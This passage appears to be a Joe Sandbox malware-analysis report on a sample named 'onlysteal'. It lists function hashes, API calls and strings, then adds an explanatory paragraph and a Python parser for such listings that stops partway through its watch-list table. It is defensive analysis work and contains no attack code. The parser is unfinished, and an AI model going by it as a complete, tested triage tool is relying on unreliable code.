                                      • Associated: 00000000.00000002.2092450648.0000000000275000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2092450648.0000000000292000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2092498429.0000000000293000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_230000_onlysteal.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 5044663825abfda298fdb72be3782c563d32154f9781b54685049d4892831647
                                      • Instruction ID: 7bcef6d83454ceb7541b0063f718f80bf8dd1fe921a3ce1e2bcc089ebf03a8c8
                                      • Opcode Fuzzy Hash: 5044663825abfda298fdb72be3782c563d32154f9781b54685049d4892831647
                                      • Instruction Fuzzy Hash: 32E16C755193908FC304CF29E88486AFFF1AF9A300F45095EF9C897392C235EA59DB92
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2092415789.0000000000231000.00000020.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true
                                      • Associated: 00000000.00000002.2092402941.0000000000230000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2092437011.0000000000263000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2092450648.000000000026E000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2092450648.0000000000275000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2092450648.0000000000292000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2092498429.0000000000293000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_230000_onlysteal.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 099330c7f7ccdd417e25f555c4bfc52021962f4fe602807f6dd12a6fe714b0d5
                                      • Instruction ID: 73b5ade62f6ad5e3670659ea1083ce0b87607a4c4173cf38f2b4841212c1b1e1
                                      • Opcode Fuzzy Hash: 099330c7f7ccdd417e25f555c4bfc52021962f4fe602807f6dd12a6fe714b0d5
                                      • Instruction Fuzzy Hash: 5A916AB02203468BD72CFF64D895BBA77D8FB90304F10092DF99A87282DAB49565CB52
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2092415789.0000000000231000.00000020.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true
                                      • Associated: 00000000.00000002.2092402941.0000000000230000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2092437011.0000000000263000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2092450648.000000000026E000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2092450648.0000000000275000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2092450648.0000000000292000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2092498429.0000000000293000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_230000_onlysteal.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 24399a2ad99dde1ffdfe4095f328d7bde986876a5c10afdb0a2a788d37c48f2a
                                      • Instruction ID: 7a537127be1ec01c2cd12312663a26eec1b3030d04409e13d6dd724c0e3669f3
                                      • Opcode Fuzzy Hash: 24399a2ad99dde1ffdfe4095f328d7bde986876a5c10afdb0a2a788d37c48f2a
                                      • Instruction Fuzzy Hash: EE8150B17243464BDF2DFF68C8D1BBD77D4ABA4304F40093DE9C68B182DA7099A58752
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2092415789.0000000000231000.00000020.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true
                                      • Associated: 00000000.00000002.2092402941.0000000000230000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2092437011.0000000000263000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2092450648.000000000026E000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2092450648.0000000000275000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2092450648.0000000000292000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2092498429.0000000000293000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_230000_onlysteal.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 373f6057a468bc8e9902d97c57b245062713886b6c4a2f199c913cb9ec554eb9
                                      • Instruction ID: e6d9ff9fedc7576517e7b8c6dd5942fb57b7aa72fd40f72c5d7f906db5807d17
                                      • Opcode Fuzzy Hash: 373f6057a468bc8e9902d97c57b245062713886b6c4a2f199c913cb9ec554eb9
                                      • Instruction Fuzzy Hash: A8617631A30F3A66DA389D6898B57BE2394AB41343F140519EC46DF281D2B1DCAE870D
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2092415789.0000000000231000.00000020.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true
                                      • Associated: 00000000.00000002.2092402941.0000000000230000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2092437011.0000000000263000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2092450648.000000000026E000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2092450648.0000000000275000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2092450648.0000000000292000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2092498429.0000000000293000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_230000_onlysteal.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: b9fa34869b2d82e3d8411e2c45cb22e435dbce3bfada8ed8319a2114c0e74f89
                                      • Instruction ID: 9ce9006c7efe0e295c62b19728fd4cefc49dc0859d988232a6709833799ab1ee
                                      • Opcode Fuzzy Hash: b9fa34869b2d82e3d8411e2c45cb22e435dbce3bfada8ed8319a2114c0e74f89
                                      • Instruction Fuzzy Hash: 8E516730230E2657DB346D6C8476BBFA7859B0630BF184809EC4AC76C2C275ADBD879D
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2092415789.0000000000231000.00000020.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true
                                      • Associated: 00000000.00000002.2092402941.0000000000230000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2092437011.0000000000263000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2092450648.000000000026E000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2092450648.0000000000275000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2092450648.0000000000292000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2092498429.0000000000293000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_230000_onlysteal.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: b8f7be8b81b8a4f2cd4525b23fc96c60d737f02945e72e642e70f3e9554c9005
                                      • Instruction ID: 4dc789c6543ad27868b4d2903e94d131d41991fe4dc716e48b44f62c4cdbff51
                                      • Opcode Fuzzy Hash: b8f7be8b81b8a4f2cd4525b23fc96c60d737f02945e72e642e70f3e9554c9005
                                      • Instruction Fuzzy Hash: 3651EA759183D54FC711CF38E64046EBFE0AFAA314F4A09ADE4D95B243C231DA5ACB62
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 3871093038937a00da40150eea7a6313335062dec76663d0dcced0d56769257a
                                      • Instruction ID: 511edc174b011983205c69c94ef4f603a980b7c4745ce236542e631aad1ba204
                                      • Opcode Fuzzy Hash: 3871093038937a00da40150eea7a6313335062dec76663d0dcced0d56769257a
                                      • Instruction Fuzzy Hash: D851E0B1A087119FC748CF19D48065AF7E1FF88314F058A2EE899E3340D734E959CB9A
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 39963e26f0f32bb957082511270cc61aa548dbbc85140380b543ac3b2cb39bde
                                      • Instruction ID: caaffd9546945b6ac4aa84cca1da880e695aefa33196cf678185b12c050cea57
                                      • Opcode Fuzzy Hash: 39963e26f0f32bb957082511270cc61aa548dbbc85140380b543ac3b2cb39bde
                                      • Instruction Fuzzy Hash: 1031C4B1A247468FCB18DF28C85126ABBE0FB95314F10492DE4D5C7742C775EA1ACB91
                                      APIs
                                      • _swprintf.LIBCMT ref: 0023E30E
                                        • Part of subcall function 00234092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 002340A5
                                        • Part of subcall function 00241DA7: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000200,00000000,00000000,?,00271030,00000200,0023D928,00000000,?,00000050,00271030), ref: 00241DC4
                                      • _strlen.LIBCMT ref: 0023E32F
                                      • SetDlgItemTextW.USER32(?,0026E274,?), ref: 0023E38F
                                      • GetWindowRect.USER32(?,?), ref: 0023E3C9
                                      • GetClientRect.USER32(?,?), ref: 0023E3D5
                                      • GetWindowLongW.USER32(?,000000F0), ref: 0023E475
                                      • GetWindowRect.USER32(?,?), ref: 0023E4A2
                                      • SetWindowTextW.USER32(?,?), ref: 0023E4DB
                                      • GetSystemMetrics.USER32(00000008), ref: 0023E4E3
                                      • GetWindow.USER32(?,00000005), ref: 0023E4EE
                                      • GetWindowRect.USER32(00000000,?), ref: 0023E51B
                                      • GetWindow.USER32(00000000,00000002), ref: 0023E58D
                                      Similarity
                                      • API ID: Window$Rect$Text$ByteCharClientItemLongMetricsMultiSystemWide__vswprintf_c_l_strlen_swprintf
                                      • String ID: $%s:$CAPTION$d$t&
                                      • API String ID: 2407758923-470129426
                                      • Opcode ID: 89d4961ffede6a035c34883062d78f01102bf339a38e77df88ca4ff9ef12c3f5
                                      • Instruction ID: 296adaa8cf152d9f816f9260f4820fab59d54e7626c9194089715653c52a4b9c
                                      • Opcode Fuzzy Hash: 89d4961ffede6a035c34883062d78f01102bf339a38e77df88ca4ff9ef12c3f5
                                      • Instruction Fuzzy Hash: C081B4B2114301AFDB10DF68DC89B6FBBE9EFC8714F05091DFA8897290D670E9198B52
                                      APIs
                                      • ___free_lconv_mon.LIBCMT ref: 0025CB66
                                        • Part of subcall function 0025C701: _free.LIBCMT ref: 0025C71E
                                        • Part of subcall function 0025C701: _free.LIBCMT ref: 0025C730
                                        • Part of subcall function 0025C701: _free.LIBCMT ref: 0025C742
                                        • Part of subcall function 0025C701: _free.LIBCMT ref: 0025C754
                                        • Part of subcall function 0025C701: _free.LIBCMT ref: 0025C766
                                        • Part of subcall function 0025C701: _free.LIBCMT ref: 0025C778
                                        • Part of subcall function 0025C701: _free.LIBCMT ref: 0025C78A
                                        • Part of subcall function 0025C701: _free.LIBCMT ref: 0025C79C
                                        • Part of subcall function 0025C701: _free.LIBCMT ref: 0025C7AE
                                        • Part of subcall function 0025C701: _free.LIBCMT ref: 0025C7C0
                                        • Part of subcall function 0025C701: _free.LIBCMT ref: 0025C7D2
                                        • Part of subcall function 0025C701: _free.LIBCMT ref: 0025C7E4
                                        • Part of subcall function 0025C701: _free.LIBCMT ref: 0025C7F6
                                      • _free.LIBCMT ref: 0025CB5B
                                        • Part of subcall function 00258DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,0025C896,00263A34,00000000,00263A34,00000000,?,0025C8BD,00263A34,00000007,00263A34,?,0025CCBA,00263A34), ref: 00258DE2
                                        • Part of subcall function 00258DCC: GetLastError.KERNEL32(00263A34,?,0025C896,00263A34,00000000,00263A34,00000000,?,0025C8BD,00263A34,00000007,00263A34,?,0025CCBA,00263A34,00263A34), ref: 00258DF4
                                      • _free.LIBCMT ref: 0025CB7D
                                      • _free.LIBCMT ref: 0025CB92
                                      • _free.LIBCMT ref: 0025CB9D
                                      • _free.LIBCMT ref: 0025CBBF
                                      • _free.LIBCMT ref: 0025CBD2
                                      • _free.LIBCMT ref: 0025CBE0
                                      • _free.LIBCMT ref: 0025CBEB
                                      • _free.LIBCMT ref: 0025CC23
                                      • _free.LIBCMT ref: 0025CC2A
                                      • _free.LIBCMT ref: 0025CC47
                                      • _free.LIBCMT ref: 0025CC5F
                                      Similarity
                                      • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                      • String ID: h&
                                      • API String ID: 161543041-2887284442
                                      • Opcode ID: 7ba05f304bec0e0b5cdda8eea2417ae0748b5b2ea9a974951673f590fa4e6aa2
                                      • Instruction ID: 6c4dcad2d349cd2e81c040fa2d1b788943b3669b8c2a7163b46b28a7be2ee1a2
                                      • Opcode Fuzzy Hash: 7ba05f304bec0e0b5cdda8eea2417ae0748b5b2ea9a974951673f590fa4e6aa2
                                      • Instruction Fuzzy Hash: 393165315213069FDB20AE38D845B5A77F9EF10316F20541AE958E7191EF75EC68CF18
                                      APIs
                                      • _free.LIBCMT ref: 00259705
                                        • Part of subcall function 00258DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,0025C896,00263A34,00000000,00263A34,00000000,?,0025C8BD,00263A34,00000007,00263A34,?,0025CCBA,00263A34), ref: 00258DE2
                                        • Part of subcall function 00258DCC: GetLastError.KERNEL32(00263A34,?,0025C896,00263A34,00000000,00263A34,00000000,?,0025C8BD,00263A34,00000007,00263A34,?,0025CCBA,00263A34,00263A34), ref: 00258DF4
                                      • _free.LIBCMT ref: 00259711
                                      • _free.LIBCMT ref: 0025971C
                                      • _free.LIBCMT ref: 00259727
                                      • _free.LIBCMT ref: 00259732
                                      • _free.LIBCMT ref: 0025973D
                                      • _free.LIBCMT ref: 00259748
                                      • _free.LIBCMT ref: 00259753
                                      • _free.LIBCMT ref: 0025975E
                                      • _free.LIBCMT ref: 0025976C
                                      Similarity
                                      • API ID: _free$ErrorFreeHeapLast
                                      • String ID: 0d&
                                      • API String ID: 776569668-146151388
                                      • Opcode ID: f37c1c38e1a53b9fc895df96bd80d3b3f50b461f54264c204f0af38e1bdbeb73
                                      • Instruction ID: a5565038d851579f691bd60479016844f2757a40fa94e56747c04e42262cc1f4
                                      • Opcode Fuzzy Hash: f37c1c38e1a53b9fc895df96bd80d3b3f50b461f54264c204f0af38e1bdbeb73
                                      • Instruction Fuzzy Hash: CE11937612110DAFCB01EF64C842CD93BB5EF14351B5154A1FF089F262DE72DAA89F88
                                      APIs
                                      • _wcslen.LIBCMT ref: 00249736
                                      • _wcslen.LIBCMT ref: 002497D6
                                      • GlobalAlloc.KERNEL32(00000040,?), ref: 002497E5
                                      • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,00000003,?,00000000,00000000), ref: 00249806
                                      • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 0024982D
                                      Similarity
                                      • API ID: Global_wcslen$AllocByteCharCreateMultiStreamWide
                                      • String ID: </html>$<head><meta http-equiv="content-type" content="text/html; charset=$<html>$utf-8"></head>
                                      • API String ID: 1777411235-4209811716
                                      • Opcode ID: 858465fdc503a6b28b5c78b11fa23b8bf244ee034af2edf341242a8d614b676f
                                      • Instruction ID: fb34b6019731b63425fdf75814dc7900c5fc8553e83c84797c3350ca2471f60c
                                      • Opcode Fuzzy Hash: 858465fdc503a6b28b5c78b11fa23b8bf244ee034af2edf341242a8d614b676f
                                      • Instruction Fuzzy Hash: F4316E325383027BD729AF349C46F6B779CEF53321F14011DF901961D1EB709AA88BAA
                                      APIs
                                      • GetWindow.USER32(?,00000005), ref: 0024D6C1
                                      • GetClassNameW.USER32(00000000,?,00000800), ref: 0024D6ED
                                        • Part of subcall function 00241FBB: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_00011FBB,0023C116,00000000,.exe,?,?,00000800,?,?,?,00248E3C), ref: 00241FD1
                                      • GetWindowLongW.USER32(00000000,000000F0), ref: 0024D709
                                      • SendMessageW.USER32(00000000,00000173,00000000,00000000), ref: 0024D720
                                      • GetObjectW.GDI32(00000000,00000018,?), ref: 0024D734
                                      • SendMessageW.USER32(00000000,00000172,00000000,00000000), ref: 0024D75D
                                      • DeleteObject.GDI32(00000000), ref: 0024D764
                                      • GetWindow.USER32(00000000,00000002), ref: 0024D76D
                                      Similarity
                                      • API ID: Window$MessageObjectSend$ClassCompareDeleteLongNameString
                                      • String ID: STATIC
                                      • API String ID: 3820355801-1882779555
                                      • Opcode ID: f231a21d102ba85f96ac2edeca6919b1934d4ea2721dc44248d46b2a1df967f0
                                      • Instruction ID: 4796218bc39ef3a8d04a7ae0100229f08bbfc7128b75d43f46895765bb2f7068
                                      • Opcode Fuzzy Hash: f231a21d102ba85f96ac2edeca6919b1934d4ea2721dc44248d46b2a1df967f0
                                      • Instruction Fuzzy Hash: 811126765A43117BE621AF70AC8EFAFB65CAF44711F014122FA41E20A1DB64CF254AB5
                                      Similarity
                                      • API ID: CallFramesMatchNestedTypeUnexpectedUnwind_aborttype_info::operator==
                                      • String ID: csm$csm$csm
                                      • API String ID: 322700389-393685449
                                      • Opcode ID: 82a4ff6693e2dccf6612a8380ace36f985f930d869f163d8a98882fe50b57469
                                      • Instruction ID: d22bb6b525d2fddf41d63f6c3b036d9fb4a358ef229245481dde7c5129e9ce9f
                                      • Opcode Fuzzy Hash: 82a4ff6693e2dccf6612a8380ace36f985f930d869f163d8a98882fe50b57469
                                      • Instruction Fuzzy Hash: 2EB19B3282020AEFCF25DFA4C8819AEB7B5BF05352F148459EC056B252D731DA79CF99
                                      Similarity
                                      • API ID: H_prolog
                                      • String ID: Name$ROOT\CIMV2$SELECT * FROM Win32_OperatingSystem$WQL$Windows 10$n$
                                      • API String ID: 3519838083-3484856611
                                      • Opcode ID: 8c607397ccfe4af3aa91f639bc0e43cc40fd04a2bfbe6e019d675eb8d396d1d7
                                      • Instruction ID: 6139f397195dfa09c83fbcbd4f9560d5e960b1e990f8464dedaf376d2f35c0b9
                                      • Opcode Fuzzy Hash: 8c607397ccfe4af3aa91f639bc0e43cc40fd04a2bfbe6e019d675eb8d396d1d7
                                      • Instruction Fuzzy Hash: CE716CB0A10219AFDF14DFA4DC999AEB7B9FF49310F144169E516A72A0CB70AD41CB60
                                      APIs
                                      • __EH_prolog.LIBCMT ref: 00236FAA
                                      • _wcslen.LIBCMT ref: 00237013
                                      • _wcslen.LIBCMT ref: 00237084
                                        • Part of subcall function 00237A9C: GetCurrentProcess.KERNEL32(00000020,?), ref: 00237AAB
                                        • Part of subcall function 00237A9C: GetLastError.KERNEL32 ref: 00237AF1
                                        • Part of subcall function 00237A9C: CloseHandle.KERNEL32(?), ref: 00237B00
                                      Similarity
                                      • API ID: _wcslen$CloseCurrentErrorH_prologHandleLastProcess
                                      • String ID: SeCreateSymbolicLinkPrivilege$SeRestorePrivilege$UNC\$\??\
                                      • API String ID: 3122303884-3508440684
                                      • Opcode ID: 3e890ea32693eafa344435b0c3dec7864c9b43d9e647b58993f8b11a2e0c4ee7
                                      • Instruction ID: 08d2292670f3bbc1bf84cfbda0bc68f9784c7e07492ae5afc00d178d55455dbd
                                      • Opcode Fuzzy Hash: 3e890ea32693eafa344435b0c3dec7864c9b43d9e647b58993f8b11a2e0c4ee7
                                      • Instruction Fuzzy Hash: 4E41FAF1D2434579EF30EB749C86FEE776C9F05314F004455FA85A7182D6709AA88B21
                                      APIs
                                        • Part of subcall function 00231316: GetDlgItem.USER32(00000000,00003021), ref: 0023135A
                                        • Part of subcall function 00231316: SetWindowTextW.USER32(00000000,002635F4), ref: 00231370
                                      • EndDialog.USER32(?,00000001), ref: 0024B610
                                      • SendMessageW.USER32(?,00000080,00000001,?), ref: 0024B637
                                      • SendDlgItemMessageW.USER32(?,00000066,00000172,00000000,?), ref: 0024B650
                                      • SetWindowTextW.USER32(?,?), ref: 0024B661
                                      • GetDlgItem.USER32(?,00000065), ref: 0024B66A
                                      • SendMessageW.USER32(00000000,00000435,00000000,00010000), ref: 0024B67E
                                      • SendMessageW.USER32(00000000,00000443,00000000,00000000), ref: 0024B694
                                      Similarity
                                      • API ID: MessageSend$Item$TextWindow$Dialog
                                      • String ID: LICENSEDLG
                                      • API String ID: 3214253823-2177901306
                                      • Opcode ID: b547ef19b3a96ea939dffb09f49f92e2c64f0ccbee486ea2210caba537e79fa8
                                      • Instruction ID: b7467812e86f8ac40dd4cad5ca292a540ff0cc9cfeb7a535154830fc0d444930
                                      • Opcode Fuzzy Hash: b547ef19b3a96ea939dffb09f49f92e2c64f0ccbee486ea2210caba537e79fa8
                                      • Instruction Fuzzy Hash: 1C21C932624215BBD616DF76FD4EF3B3B6DEB46B85F020016FA04D60A0CB62D9219B35
                                      APIs
                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,4409F1A1,00000001,00000000,00000000,?,?,0023AF6C,ROOT\CIMV2), ref: 0024FD99
                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,?,?,0023AF6C,ROOT\CIMV2), ref: 0024FE14
                                      • SysAllocString.OLEAUT32(00000000), ref: 0024FE1F
                                      • _com_issue_error.COMSUPP ref: 0024FE48
                                      • _com_issue_error.COMSUPP ref: 0024FE52
                                      • GetLastError.KERNEL32(80070057,4409F1A1,00000001,00000000,00000000,?,?,0023AF6C,ROOT\CIMV2), ref: 0024FE57
                                      • _com_issue_error.COMSUPP ref: 0024FE6A
                                      • GetLastError.KERNEL32(00000000,?,?,0023AF6C,ROOT\CIMV2), ref: 0024FE80
                                      • _com_issue_error.COMSUPP ref: 0024FE93
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2092415789.0000000000231000.00000020.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true
                                      • Associated: 00000000.00000002.2092402941.0000000000230000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2092437011.0000000000263000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2092450648.000000000026E000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2092450648.0000000000275000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2092450648.0000000000292000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2092498429.0000000000293000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_230000_onlysteal.jbxd
                                      Similarity
                                      • API ID: _com_issue_error$ByteCharErrorLastMultiWide$AllocString
                                      • String ID:
                                      • API String ID: 1353541977-0
                                      • Opcode ID: 15722b2ebee44b768b88701de0e2fa6a8f441b2c512008eab4b59235982bb2e8
                                      • Instruction ID: da570bd35823cb86c104eefee6a6bd4e53c3071b25a2efed3d69635f550660b5
                                      • Opcode Fuzzy Hash: 15722b2ebee44b768b88701de0e2fa6a8f441b2c512008eab4b59235982bb2e8
                                      • Instruction Fuzzy Hash: 01412A71B10215EFCB14DF68DD45BAEBBA8EF88711F10823AF905E7291D7749920CBA4
                                      APIs
                                      • __EH_prolog.LIBCMT ref: 00239387
                                      • GetLongPathNameW.KERNEL32(?,?,00000800), ref: 002393AA
                                      • GetShortPathNameW.KERNEL32(?,?,00000800), ref: 002393C9
                                        • Part of subcall function 0023C29A: _wcslen.LIBCMT ref: 0023C2A2
                                        • Part of subcall function 00241FBB: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_00011FBB,0023C116,00000000,.exe,?,?,00000800,?,?,?,00248E3C), ref: 00241FD1
                                      • _swprintf.LIBCMT ref: 00239465
                                        • Part of subcall function 00234092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 002340A5
                                      • MoveFileW.KERNEL32(?,?), ref: 002394D4
                                      • MoveFileW.KERNEL32(?,?), ref: 00239514
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2092415789.0000000000231000.00000020.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true
                                      • Associated: 00000000.00000002.2092402941.0000000000230000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2092437011.0000000000263000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2092450648.000000000026E000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2092450648.0000000000275000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2092450648.0000000000292000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2092498429.0000000000293000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_230000_onlysteal.jbxd
                                      Similarity
                                      • API ID: FileMoveNamePath$CompareH_prologLongShortString__vswprintf_c_l_swprintf_wcslen
                                      • String ID: rtmp%d
                                      • API String ID: 3726343395-3303766350
                                      • Opcode ID: 7d28df8245850e777871e6dce9aff4221b381d3f0aa59c66ffad77b4293b154a
                                      • Instruction ID: 9ea0604922ef2869399fa5a302df8ffab29efae12b2e1a229e8fa6adf594b3c1
                                      • Opcode Fuzzy Hash: 7d28df8245850e777871e6dce9aff4221b381d3f0aa59c66ffad77b4293b154a
                                      • Instruction Fuzzy Hash: 544142F192125566DF21EF60CC45EDE737CAF56340F4048A5B649F3051DAB88BE98F60
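Each block above is the Joe Sandbox IDA-plugin summary of one function: the APIs it calls (lines marked "Part of subcall function" are calls made by a callee, not by the function itself), the String ID it references, and the Opcode and Instruction fuzzy hashes, which are the values to pivot on when looking for the same code in other reports. The Python below is an added example and is not part of the report or of Joe Sandbox: it parses entries of this shape into records, separates direct calls from subcall ones, and applies a small triage heuristic. The WATCH table and the ROOT\CIMV2 check are my own assumptions about what is worth a second look, not something the report asserts, and SAMPLE is constructed from two entries on this page, trimmed to a few lines each.

```python
"""Parse the per-function 'APIs' / 'Similarity' listings of a Joe Sandbox
IDA-plugin dump into records that can be filtered and pivoted on."""
import re
from dataclasses import dataclass, field

# One API line: optional "Part of subcall function XXXX:" prefix, then
# Name.MODULE, optional "(args)", then "ref: <address>".
API_RE = re.compile(
    r"^\s*• (?P<sub>Part of subcall function [0-9A-Fa-f]+: )?"
    r"(?P<name>[A-Za-z_][\w@]*)\.(?P<module>[A-Za-z_]\w*)"
    r"(?:\((?P<args>.*)\))?,? ref: (?P<ref>[0-9A-Fa-f]+)\s*$"
)
# Metadata line such as "• String ID: rtmp%d" or "• Opcode Fuzzy Hash: ...".
FIELD_RE = re.compile(r"^\s*• (?P<key>[A-Za-z][A-Za-z ]*?): ?(?P<val>.*?)\s*$")

# Constructed sample: two entries from this report, shortened. Not a full dump.
SAMPLE = """APIs
• MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,4409F1A1,00000001,00000000,00000000,?,?,0023AF6C,ROOT\\CIMV2), ref: 0024FD99
• SysAllocString.OLEAUT32(00000000), ref: 0024FE1F
• _com_issue_error.COMSUPP ref: 0024FE48
Memory Dump Source
• Source File: 00000000.00000002.2092415789.0000000000231000.00000020.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true
Similarity
• API ID: _com_issue_error$ByteCharErrorLastMultiWide$AllocString
• String ID:
• Opcode Fuzzy Hash: 15722b2ebee44b768b88701de0e2fa6a8f441b2c512008eab4b59235982bb2e8
• Instruction Fuzzy Hash: 01412A71B10215EFCB14DF68DD45BAEBBA8EF88711F10823AF905E7291D7749920CBA4
APIs
• __EH_prolog.LIBCMT ref: 00239387
• GetLongPathNameW.KERNEL32(?,?,00000800), ref: 002393AA
  • Part of subcall function 0023C29A: _wcslen.LIBCMT ref: 0023C2A2
• _swprintf.LIBCMT ref: 00239465
• MoveFileW.KERNEL32(?,?), ref: 002394D4
• MoveFileW.KERNEL32(?,?), ref: 00239514
Strings
Similarity
• String ID: rtmp%d
• Opcode Fuzzy Hash: 7d28df8245850e777871e6dce9aff4221b381d3f0aa59c66ffad77b4293b154a
• Instruction Fuzzy Hash: 544142F192125566DF21EF60CC45EDE737CAF56340F4048A5B649F3051DAB88BE98F60
"""


@dataclass
class ApiCall:
    name: str
    module: str
    args: tuple
    ref: str
    subcall: bool  # True when the line was a "Part of subcall function" entry


@dataclass
class FunctionEntry:
    calls: list = field(default_factory=list)
    meta: dict = field(default_factory=dict)

    def direct_apis(self):
        """API names called by the function itself, in listing order."""
        return [c.name for c in self.calls if not c.subcall]

    def pivot_key(self):
        """The two fuzzy hashes Joe Sandbox exposes for cross-report matching."""
        return (self.meta.get("Opcode Fuzzy Hash"), self.meta.get("Instruction Fuzzy Hash"))


def parse_entries(text):
    """Split the dump at each 'APIs' header and collect calls and metadata."""
    entries, cur = [], None
    for raw in text.splitlines():
        line = raw.strip()
        if line == "APIs":  # every function block starts with this header
            cur = FunctionEntry()
            entries.append(cur)
            continue
        if cur is None or not line.startswith("•"):
            continue  # plain section headers: Strings, Similarity, Memory Dump Source
        m = API_RE.match(line)
        if m:
            args = tuple(a.strip() for a in m["args"].split(",")) if m["args"] is not None else ()
            cur.calls.append(ApiCall(m["name"], m["module"], args, m["ref"], m["sub"] is not None))
            continue
        m = FIELD_RE.match(line)
        if m:
            cur.meta[m["key"]] = m["val"]
    return entries


# Assumed triage heuristic (mine, not the report's): API families that deserve
# a look in an unpacker/dropper, plus a check for the WMI namespace as an argument.
WATCH = {
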